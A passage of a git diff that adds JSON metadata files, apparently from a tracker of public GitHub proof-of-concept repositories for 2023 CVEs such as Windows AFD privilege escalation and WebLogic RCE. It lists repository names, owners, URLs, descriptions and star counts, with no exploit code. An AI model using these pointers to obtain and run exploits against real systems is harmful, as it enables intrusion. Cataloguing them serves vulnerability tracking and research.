"2024-09-23T13:46:22Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21739.json b/2023/CVE-2023-21739.json new file mode 100644 index 0000000000..9e1f78a185 --- /dev/null +++ b/2023/CVE-2023-21739.json @@ -0,0 +1,33 @@ +[ + { + "id": 591426445, + "name": "CVE-2023-21739", + "full_name": "gmh5225\/CVE-2023-21739", + "owner": { + "login": "gmh5225", + "id": 13917777, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13917777?v=4", + "html_url": "https:\/\/github.com\/gmh5225", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/gmh5225\/CVE-2023-21739", + "description": "Windows Bluetooth Driver Elevation of Privilege Vulnerability. CVE project by @Sn0wAlice", + "fork": false, + "created_at": "2023-01-20T18:21:40Z", + "updated_at": "2024-02-08T11:34:33Z", + "pushed_at": "2023-01-18T23:57:58Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21742.json b/2023/CVE-2023-21742.json new file mode 100644 index 0000000000..8efeabbbda --- /dev/null +++ b/2023/CVE-2023-21742.json @@ -0,0 +1,33 @@ +[ + { + "id": 625051221, + "name": "CVE-2023-21742", + "full_name": "ohnonoyesyes\/CVE-2023-21742", + "owner": { + "login": "ohnonoyesyes", + "id": 93457304, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93457304?v=4", + "html_url": "https:\/\/github.com\/ohnonoyesyes", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ohnonoyesyes\/CVE-2023-21742", + "description": "CVE-2023-21742 Poc", + "fork": false, + "created_at": "2023-04-07T23:46:25Z", + "updated_at": "2024-12-18T14:45:34Z", + "pushed_at": "2023-04-07T23:49:58Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21746.json b/2023/CVE-2023-21746.json new file mode 100644 index 0000000000..60e33588e2 --- /dev/null +++ b/2023/CVE-2023-21746.json @@ -0,0 +1,33 @@ +[ + { + "id": 667091173, + "name": "LocalPotato_CVE-2023-21746", + "full_name": "Muhammad-Ali007\/LocalPotato_CVE-2023-21746", + "owner": { + "login": "Muhammad-Ali007", + "id": 64638296, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64638296?v=4", + "html_url": "https:\/\/github.com\/Muhammad-Ali007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Muhammad-Ali007\/LocalPotato_CVE-2023-21746", + "description": null, + "fork": false, + "created_at": "2023-07-16T15:57:37Z", + "updated_at": "2024-02-24T07:35:51Z", + "pushed_at": "2023-07-16T16:05:35Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 4, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21752.json b/2023/CVE-2023-21752.json new file mode 100644 index 0000000000..b820ccc41b --- /dev/null +++ b/2023/CVE-2023-21752.json @@ -0,0 +1,64 @@ +[ + { + "id": 587377595, + "name": "CVE-2023-21752", + "full_name": "Wh04m1001\/CVE-2023-21752", + "owner": { + "login": "Wh04m1001", + "id": 44291883, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44291883?v=4", + "html_url": "https:\/\/github.com\/Wh04m1001", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Wh04m1001\/CVE-2023-21752", + "description": null, + "fork": false, + "created_at": "2023-01-10T15:59:26Z", + "updated_at": "2024-12-31T20:57:04Z", + "pushed_at": "2023-01-13T09:01:20Z", + "stargazers_count": 308, + "watchers_count": 308, + "has_discussions": false, + "forks_count": 66, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 66, + "watchers": 308, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 677068156, + "name": "CVE-2023-21752", + "full_name": "yosef0x01\/CVE-2023-21752", + "owner": { + "login": "yosef0x01", + "id": 96077889, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96077889?v=4", + "html_url": "https:\/\/github.com\/yosef0x01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/yosef0x01\/CVE-2023-21752", + "description": null, + "fork": false, + "created_at": "2023-08-10T16:55:06Z", + "updated_at": "2023-08-10T16:55:07Z", + "pushed_at": "2023-08-23T04:07:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21766.json b/2023/CVE-2023-21766.json new file mode 100644 index 0000000000..cb6b16c2f2 --- /dev/null +++ b/2023/CVE-2023-21766.json @@ -0,0 +1,33 @@ +[ + { + "id": 660454811, + "name": "cve-2023-21766", + "full_name": "Y3A\/cve-2023-21766", + "owner": { + "login": "Y3A", + "id": 62646606, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62646606?v=4", + "html_url": "https:\/\/github.com\/Y3A", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y3A\/cve-2023-21766", + "description": "wof.sys race condition uaf read poc", + "fork": false, + "created_at": "2023-06-30T03:44:01Z", + "updated_at": "2023-06-30T03:44:29Z", + "pushed_at": "2023-06-30T03:44:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21768.json b/2023/CVE-2023-21768.json new file mode 100644 index 0000000000..11f1da3b1c --- /dev/null +++ b/2023/CVE-2023-21768.json @@ -0,0 +1,351 @@ +[ + { + "id": 611004357, + "name": "Windows_LPE_AFD_CVE-2023-21768", + "full_name": "chompie1337\/Windows_LPE_AFD_CVE-2023-21768", + "owner": { + "login": "chompie1337", + "id": 56364411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56364411?v=4", + "html_url": "https:\/\/github.com\/chompie1337", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chompie1337\/Windows_LPE_AFD_CVE-2023-21768", + "description": "LPE exploit for CVE-2023-21768", + "fork": false, + "created_at": "2023-03-07T23:00:27Z", + "updated_at": "2024-12-22T23:14:00Z", + "pushed_at": "2023-07-10T16:35:49Z", + "stargazers_count": 486, + "watchers_count": 486, + "has_discussions": false, + "forks_count": 163, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 163, + "watchers": 486, + "score": 0, + "subscribers_count": 10 + }, + { + "id": 612032133, + "name": "cve-2023-21768-compiled", + "full_name": "cl4ym0re\/cve-2023-21768-compiled", + "owner": { + "login": "cl4ym0re", + "id": 70927349, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70927349?v=4", + "html_url": "https:\/\/github.com\/cl4ym0re", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cl4ym0re\/cve-2023-21768-compiled", + "description": "cve-2023-21768", + "fork": false, + "created_at": "2023-03-10T03:36:52Z", + "updated_at": "2025-01-03T19:43:54Z", + "pushed_at": "2023-03-10T04:03:04Z", + "stargazers_count": 21, + "watchers_count": 21, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 21, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612358302, + "name": "nullmap", + "full_name": "SamuelTulach\/nullmap", + "owner": { + "login": "SamuelTulach", + "id": 16323119, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16323119?v=4", + "html_url": "https:\/\/github.com\/SamuelTulach", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/SamuelTulach\/nullmap", + "description": "Using CVE-2023-21768 to manual map kernel mode driver ", + "fork": false, + "created_at": "2023-03-10T19:08:28Z", + "updated_at": "2025-01-07T11:27:26Z", + "pushed_at": "2023-03-10T20:16:53Z", + "stargazers_count": 180, + "watchers_count": 180, + "has_discussions": false, + "forks_count": 36, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-21768", + "driver", + "exploit", + "kernel", + "manual-mapper", + "mapper", + "windows" + ], + "visibility": "public", + "forks": 36, + "watchers": 180, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 613567366, + "name": "CVE-2023-21768", + "full_name": "Malwareman007\/CVE-2023-21768", + "owner": { + "login": "Malwareman007", + "id": 86009160, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/86009160?v=4", + "html_url": "https:\/\/github.com\/Malwareman007", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Malwareman007\/CVE-2023-21768", + "description": "Windows_AFD_LPE_CVE-2023-21768", + "fork": false, + "created_at": "2023-03-13T20:32:50Z", + "updated_at": "2024-12-07T02:44:35Z", + "pushed_at": "2023-08-27T10:41:40Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 42, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 616747050, + "name": "Windows_AFD_LPE_CVE-2023-21768", + "full_name": "HKxiaoli\/Windows_AFD_LPE_CVE-2023-21768", + "owner": { + "login": "HKxiaoli", + "id": 65068574, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/65068574?v=4", + "html_url": "https:\/\/github.com\/HKxiaoli", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/HKxiaoli\/Windows_AFD_LPE_CVE-2023-21768", + "description": "Windows 11 System Permission Elevation", + "fork": false, + "created_at": "2023-03-21T01:58:40Z", + "updated_at": "2024-04-12T17:43:29Z", + "pushed_at": "2023-03-21T06:53:47Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 617339899, + "name": "CVE-2023-21768-POC", + "full_name": "3yujw7njai\/CVE-2023-21768-POC", + "owner": { + "login": "3yujw7njai", + "id": 7390055, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7390055?v=4", + "html_url": "https:\/\/github.com\/3yujw7njai", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/3yujw7njai\/CVE-2023-21768-POC", + "description": "CVE-2023-21768 Windows 11 22H2 系统本地提权 POC", + "fork": false, + "created_at": "2023-03-22T07:24:36Z", + "updated_at": "2024-08-29T08:56:50Z", + "pushed_at": "2023-03-22T07:34:53Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 623746365, + "name": "CVE-2023-21768", + "full_name": "h1bAna\/CVE-2023-21768", + "owner": { + "login": "h1bAna", + "id": 70074237, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70074237?v=4", + "html_url": "https:\/\/github.com\/h1bAna", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/h1bAna\/CVE-2023-21768", + "description": null, + "fork": false, + "created_at": "2023-04-05T02:05:17Z", + "updated_at": "2024-08-09T05:15:14Z", + "pushed_at": "2023-04-05T02:07:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 630367708, + "name": "CVE-2023-21768-AFD-for-WinSock-EoP-exploit", + "full_name": "zoemurmure\/CVE-2023-21768-AFD-for-WinSock-EoP-exploit", + "owner": { + "login": "zoemurmure", + "id": 43516782, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43516782?v=4", + "html_url": "https:\/\/github.com\/zoemurmure", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zoemurmure\/CVE-2023-21768-AFD-for-WinSock-EoP-exploit", + "description": null, + "fork": false, + "created_at": "2023-04-20T08:26:42Z", + "updated_at": "2024-09-04T14:08:39Z", + "pushed_at": "2023-04-21T02:17:17Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 699311026, + "name": "Recreate-cve-2023-21768", + "full_name": "Rosayxy\/Recreate-cve-2023-21768", + "owner": { + "login": "Rosayxy", + "id": 130039321, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130039321?v=4", + "html_url": "https:\/\/github.com\/Rosayxy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Rosayxy\/Recreate-cve-2023-21768", + "description": "recreating exp for cve-2023-21768.", + "fork": false, + "created_at": "2023-10-02T11:36:49Z", + "updated_at": "2023-10-02T13:58:53Z", + "pushed_at": "2023-10-02T12:06:54Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 783126137, + "name": "CVE-2023-21768", + "full_name": "ldrx30\/CVE-2023-21768", + "owner": { + "login": "ldrx30", + "id": 102413682, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/102413682?v=4", + "html_url": "https:\/\/github.com\/ldrx30", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ldrx30\/CVE-2023-21768", + "description": "CVE-2023-21768 Proof of Concept", + "fork": false, + "created_at": "2024-04-07T02:26:36Z", + "updated_at": "2024-04-07T02:53:21Z", + "pushed_at": "2024-04-07T02:53:18Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 801154640, + "name": "CVE-2023-21768-dotnet", + "full_name": "xboxoneresearch\/CVE-2023-21768-dotnet", + "owner": { + "login": "xboxoneresearch", + "id": 43215579, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43215579?v=4", + "html_url": "https:\/\/github.com\/xboxoneresearch", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xboxoneresearch\/CVE-2023-21768-dotnet", + "description": "C# \/ .NET version of CVE-2023-21768", + "fork": false, + "created_at": "2024-05-15T17:42:10Z", + "updated_at": "2024-11-16T11:28:09Z", + "pushed_at": "2024-09-06T18:19:31Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 13, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21823.json b/2023/CVE-2023-21823.json new file mode 100644 index 0000000000..8ec7c14d96 --- /dev/null +++ b/2023/CVE-2023-21823.json @@ -0,0 +1,33 @@ +[ + { + "id": 630435422, + "name": "CVE-2023-21823", + "full_name": "Elizarfish\/CVE-2023-21823", + "owner": { + "login": "Elizarfish", + "id": 47054974, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47054974?v=4", + "html_url": "https:\/\/github.com\/Elizarfish", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Elizarfish\/CVE-2023-21823", + "description": " CVE-2023-21823 PoC", + "fork": false, + "created_at": "2023-04-20T11:26:48Z", + "updated_at": "2024-09-12T06:26:36Z", + "pushed_at": "2023-04-20T11:36:55Z", + "stargazers_count": 13, + "watchers_count": 13, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 13, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21837.json b/2023/CVE-2023-21837.json new file mode 100644 index 0000000000..eaf7b70964 --- /dev/null +++ b/2023/CVE-2023-21837.json @@ -0,0 +1,33 @@ +[ + { + "id": 624692890, + "name": "CVE-2023-21837", + "full_name": "hktalent\/CVE-2023-21837", + "owner": { + "login": "hktalent", + "id": 18223385, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18223385?v=4", + "html_url": "https:\/\/github.com\/hktalent", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/hktalent\/CVE-2023-21837", + "description": "POC,EXP, chatGPT for me", + "fork": false, + "created_at": "2023-04-07T03:18:12Z", + "updated_at": "2023-04-07T03:19:16Z", + "pushed_at": "2023-04-07T03:18:31Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21839.json b/2023/CVE-2023-21839.json new file mode 100644 index 0000000000..f237adba61 --- /dev/null +++ b/2023/CVE-2023-21839.json @@ -0,0 +1,223 @@ +[ + { + "id": 604704774, + "name": "Weblogic-CVE-2023-21839", + "full_name": "DXask88MA\/Weblogic-CVE-2023-21839", + "owner": { + "login": "DXask88MA", + "id": 53396671, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53396671?v=4", + "html_url": "https:\/\/github.com\/DXask88MA", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DXask88MA\/Weblogic-CVE-2023-21839", + "description": null, + "fork": false, + "created_at": "2023-02-21T16:08:56Z", + "updated_at": "2024-12-26T15:15:39Z", + "pushed_at": "2023-02-26T06:43:18Z", + "stargazers_count": 230, + "watchers_count": 230, + "has_discussions": false, + "forks_count": 44, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 44, + "watchers": 230, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 606055426, + "name": "CVE-2023-21839", + "full_name": "ASkyeye\/CVE-2023-21839", + "owner": { + "login": "ASkyeye", + "id": 50972716, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50972716?v=4", + "html_url": "https:\/\/github.com\/ASkyeye", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ASkyeye\/CVE-2023-21839", + "description": "Weblogic CVE-2023-21839 RCE (无需Java依赖一键RCE)", + "fork": false, + "created_at": "2023-02-24T13:54:42Z", + "updated_at": "2025-01-06T05:53:25Z", + "pushed_at": "2023-02-24T13:29:38Z", + "stargazers_count": 67, + "watchers_count": 67, + "has_discussions": false, + "forks_count": 108, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 108, + "watchers": 67, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 612534596, + "name": "CVE-2023-21839", + "full_name": "Firebasky\/CVE-2023-21839", + "owner": { + "login": "Firebasky", + "id": 63966847, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63966847?v=4", + "html_url": "https:\/\/github.com\/Firebasky", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Firebasky\/CVE-2023-21839", + "description": "CVE-2023-21839工具", + "fork": false, + "created_at": "2023-03-11T08:26:30Z", + "updated_at": "2024-11-17T04:03:10Z", + "pushed_at": "2023-03-11T08:28:28Z", + "stargazers_count": 27, + "watchers_count": 27, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 27, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 628215658, + "name": "POC_CVE-2023-21839", + "full_name": "houqe\/POC_CVE-2023-21839", + "owner": { + "login": "houqe", + "id": 44364208, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44364208?v=4", + "html_url": "https:\/\/github.com\/houqe", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/houqe\/POC_CVE-2023-21839", + "description": "CVE-2023-21839 Python版本", + "fork": false, + "created_at": "2023-04-15T08:57:10Z", + "updated_at": "2024-11-08T00:50:08Z", + "pushed_at": "2023-04-21T07:53:54Z", + "stargazers_count": 15, + "watchers_count": 15, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 15, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 646638117, + "name": "CVE-2023-21839-metasploit-scanner", + "full_name": "kw3h4\/CVE-2023-21839-metasploit-scanner", + "owner": { + "login": "kw3h4", + "id": 39688302, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39688302?v=4", + "html_url": "https:\/\/github.com\/kw3h4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kw3h4\/CVE-2023-21839-metasploit-scanner", + "description": null, + "fork": false, + "created_at": "2023-05-29T02:08:37Z", + "updated_at": "2023-05-30T08:43:02Z", + "pushed_at": "2023-06-05T06:26:28Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 726816567, + "name": "Gui-poc-test", + "full_name": "Romanc9\/Gui-poc-test", + "owner": { + "login": "Romanc9", + "id": 55196564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55196564?v=4", + "html_url": "https:\/\/github.com\/Romanc9", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Romanc9\/Gui-poc-test", + "description": "A testing tool for CobaltStrike-RCE:CVE-2022-39197; Weblogic-RCE:CVE-2023-21839; MinIO:CVE-2023-28432", + "fork": false, + "created_at": "2023-12-03T13:45:34Z", + "updated_at": "2024-09-01T03:50:31Z", + "pushed_at": "2023-12-05T17:58:36Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2022-39197", + "cve-2023-21839", + "cve-2023-28432" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 753664721, + "name": "CVE-2024-20931", + "full_name": "dinosn\/CVE-2024-20931", + "owner": { + "login": "dinosn", + "id": 3851678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3851678?v=4", + "html_url": "https:\/\/github.com\/dinosn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dinosn\/CVE-2024-20931", + "description": "CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839", + "fork": false, + "created_at": "2024-02-06T15:09:33Z", + "updated_at": "2024-11-02T04:11:58Z", + "pushed_at": "2024-02-06T15:56:12Z", + "stargazers_count": 61, + "watchers_count": 61, + "has_discussions": false, + "forks_count": 11, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 11, + "watchers": 61, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21887.json b/2023/CVE-2023-21887.json new file mode 100644 index 0000000000..8e5ca3a466 --- /dev/null +++ b/2023/CVE-2023-21887.json @@ -0,0 +1,33 @@ +[ + { + "id": 745522429, + "name": "CVE-2023-21887", + "full_name": "zwxxb\/CVE-2023-21887", + "owner": { + "login": "zwxxb", + "id": 68430832, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68430832?v=4", + "html_url": "https:\/\/github.com\/zwxxb", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/zwxxb\/CVE-2023-21887", + "description": "Remote Code Execution : Ivanti ", + "fork": false, + "created_at": "2024-01-19T14:17:49Z", + "updated_at": "2024-03-08T15:05:53Z", + "pushed_at": "2024-01-19T15:30:18Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21931.json b/2023/CVE-2023-21931.json new file mode 100644 index 0000000000..fec6d6ad6e --- /dev/null +++ b/2023/CVE-2023-21931.json @@ -0,0 +1,33 @@ +[ + { + "id": 709326797, + "name": "weblogic_CVE-2023-21931_POC-EXP", + "full_name": "TimeSHU\/weblogic_CVE-2023-21931_POC-EXP", + "owner": { + "login": "TimeSHU", + "id": 38472514, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38472514?v=4", + "html_url": "https:\/\/github.com\/TimeSHU", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/TimeSHU\/weblogic_CVE-2023-21931_POC-EXP", + "description": null, + "fork": false, + "created_at": "2023-10-24T13:49:15Z", + "updated_at": "2023-10-24T13:49:15Z", + "pushed_at": "2023-10-21T14:14:41Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21939.json b/2023/CVE-2023-21939.json new file mode 100644 index 0000000000..5a37293da5 --- /dev/null +++ b/2023/CVE-2023-21939.json @@ -0,0 +1,33 @@ +[ + { + "id": 683311147, + "name": "CVE-2023-21939", + "full_name": "Y4Sec-Team\/CVE-2023-21939", + "owner": { + "login": "Y4Sec-Team", + "id": 141109859, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141109859?v=4", + "html_url": "https:\/\/github.com\/Y4Sec-Team", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Y4Sec-Team\/CVE-2023-21939", + "description": "JDK CVE-2023-21939", + "fork": false, + "created_at": "2023-08-26T06:45:26Z", + "updated_at": "2024-12-31T01:23:52Z", + "pushed_at": "2023-08-26T06:57:55Z", + "stargazers_count": 95, + "watchers_count": 95, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 14, + "watchers": 95, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21971.json b/2023/CVE-2023-21971.json new file mode 100644 index 0000000000..5e97d3a4b2 --- /dev/null +++ b/2023/CVE-2023-21971.json @@ -0,0 +1,33 @@ +[ + { + "id": 650887863, + "name": "CVE-2023-21971_Analysis", + "full_name": "Avento\/CVE-2023-21971_Analysis", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-21971_Analysis", + "description": "CVE-2023-21971 Connector\/J RCE Analysis分析", + "fork": false, + "created_at": "2023-06-08T03:05:54Z", + "updated_at": "2023-10-19T08:06:25Z", + "pushed_at": "2023-06-08T03:06:22Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-21987.json b/2023/CVE-2023-21987.json new file mode 100644 index 0000000000..2daf2504f9 --- /dev/null +++ b/2023/CVE-2023-21987.json @@ -0,0 +1,33 @@ +[ + { + "id": 862382230, + "name": "cve-2023-21987-poc", + "full_name": "chunzhennn\/cve-2023-21987-poc", + "owner": { + "login": "chunzhennn", + "id": 38834411, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38834411?v=4", + "html_url": "https:\/\/github.com\/chunzhennn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/chunzhennn\/cve-2023-21987-poc", + "description": "Oracle VirtualBox VGA OOB-Read Vulnerability", + "fork": false, + "created_at": "2024-09-24T14:01:57Z", + 